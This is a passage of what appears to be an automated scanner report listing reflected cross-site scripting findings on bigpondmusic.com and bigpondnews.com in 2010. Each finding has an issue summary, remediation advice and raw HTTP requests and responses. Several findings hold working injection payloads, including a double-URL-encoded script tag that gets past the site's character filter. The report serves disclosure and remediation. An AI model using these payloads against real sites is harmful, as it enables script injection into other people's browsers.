Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87822


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'urlshortenbe2aa';45aad6d3561';
   s.prop4 = 'totwitter';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop
...[SNIP]...

2.402. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /urlshorten/totwitter

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37397%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee604c687f12 was submitted in the REST URL parameter 1. This input was echoed as 37397"><script>alert(1)</script>e604c687f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /urlshorten37397%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee604c687f12/totwitter HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88353


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/urlshorten37397"><script>alert(1)</script>e604c687f12/totwitter" />
...[SNIP]...

2.403. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /urlshorten/totwitter

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf323%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0865f5989db was submitted in the REST URL parameter 2. This input was echoed as bf323"><script>alert(1)</script>0865f5989db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /urlshorten/totwitterbf323%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0865f5989db HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88353


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/urlshorten/totwitterbf323"><script>alert(1)</script>0865f5989db" />
...[SNIP]...

2.404. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /urlshorten/totwitter

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a13d'%3b4ae2072be75 was submitted in the REST URL parameter 2. This input was echoed as 8a13d';4ae2072be75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /urlshorten/totwitter8a13d'%3b4ae2072be75 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88011


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
g.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'urlshorten';
   s.prop4 = 'totwitter8a13d';4ae2072be75';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.405. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bfa'%3b183c98526e3 was submitted in the REST URL parameter 2. This input was echoed as 96bfa';183c98526e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Crime96bfa'%3b183c98526e3/2010/11/22/PNG_boy_gang_raped_by_women_542337.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:40 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=3D07BCFEC9511A98463FC2810D3FFD1D; Path=/
Content-Language: en
Content-Length: 55078
Expires: Tue, 23 Nov 2010 03:35:40 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='Crime96bfa';183c98526e3';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.406. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89aa1"><a>7f0c239daa7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/Crime89aa1"><a>7f0c239daa7/2010/11/22/PNG_boy_gang_raped_by_women_542337.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:09 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=0759C54ADB044B2BFE80FE176C696A15; Path=/
Content-Language: en
Content-Length: 55090
Expires: Tue, 23 Nov 2010 03:35:09 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/Crime89aa1"><a>7f0c239daa7/1">
...[SNIP]...

2.407. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4753"%3b3264eb8a561 was submitted in the REST URL parameter 2. This input was echoed as d4753";3264eb8a561 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Crimed4753"%3b3264eb8a561/2010/11/22/PNG_boy_gang_raped_by_women_542337.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:35 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=0825DC71DAEA3C26CB30D57B47CAAE40; Path=/
Content-Language: en
Content-Length: 55078
Expires: Tue, 23 Nov 2010 03:35:35 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "CRIMED4753";3264EB8A561"
});
</script>
...[SNIP]...

2.408. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 705e4'%3b5dd0c3835a0 was submitted in the REST URL parameter 2. This input was echoed as 705e4';5dd0c3835a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Entertainment705e4'%3b5dd0c3835a0/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:24 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=0FED92A11255198BF9EEDEA49D287156; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:35:24 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='Entertainment705e4';5dd0c3835a0';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.409. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73153"%3bdae3e1737b0 was submitted in the REST URL parameter 2. This input was echoed as 73153";dae3e1737b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Entertainment73153"%3bdae3e1737b0/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:19 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=6962793CA6AA62BCD37DC759749235C6; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:35:19 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "ENTERTAINMENT73153";DAE3E1737B0"
});
</script>
...[SNIP]...

2.410. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dd0f"><a>c5c8d13386 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/Entertainment3dd0f"><a>c5c8d13386/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:53 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=37D55CE50E0A0D713B2E664BFFEB7598; Path=/
Content-Language: en
Content-Length: 55118
Expires: Tue, 23 Nov 2010 03:34:53 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/Entertainment3dd0f"><a>c5c8d13386/1">
...[SNIP]...

2.411. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b5b2"%3b8ca4c1b66f7 was submitted in the REST URL parameter 2. This input was echoed as 7b5b2";8ca4c1b66f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Entertainment7b5b2"%3b8ca4c1b66f7/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:31 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=E4ECA234A8E3804EAB489079F6D796C1; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:35:31 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "ENTERTAINMENT7B5B2";8CA4C1B66F7"
});
</script>
...[SNIP]...

2.412. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5aa8"><a>0be3d1ab538 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/Entertainmentf5aa8"><a>0be3d1ab538/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:06 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=084367B6D906DAC674D1F7F3C30B7C7F; Path=/
Content-Language: en
Content-Length: 55122
Expires: Tue, 23 Nov 2010 03:35:06 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/Entertainmentf5aa8"><a>0be3d1ab538/1">
...[SNIP]...

2.413. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4152'%3b20a210608ab was submitted in the REST URL parameter 2. This input was echoed as b4152';20a210608ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Entertainmentb4152'%3b20a210608ab/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:36 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=30FE261BD5485EBF7601E453BCEF36A8; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:35:36 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='Entertainmentb4152';20a210608ab';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.414. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60f3"%3b68aca0775b8 was submitted in the REST URL parameter 2. This input was echoed as d60f3";68aca0775b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Financed60f3"%3b68aca0775b8/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:38 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=74834D0329A6270AE85688FE29630897; Path=/
Content-Language: en
Content-Length: 55086
Expires: Tue, 23 Nov 2010 03:34:38 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "FINANCED60F3";68ACA0775B8"
});
</script>
...[SNIP]...

2.415. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c6bc'%3b2d469c6535b was submitted in the REST URL parameter 2. This input was echoed as 3c6bc';2d469c6535b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Finance3c6bc'%3b2d469c6535b/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:44 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=9EA5C9E7E2DC903B1426C28079490C11; Path=/
Content-Language: en
Content-Length: 55086
Expires: Tue, 23 Nov 2010 03:34:44 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

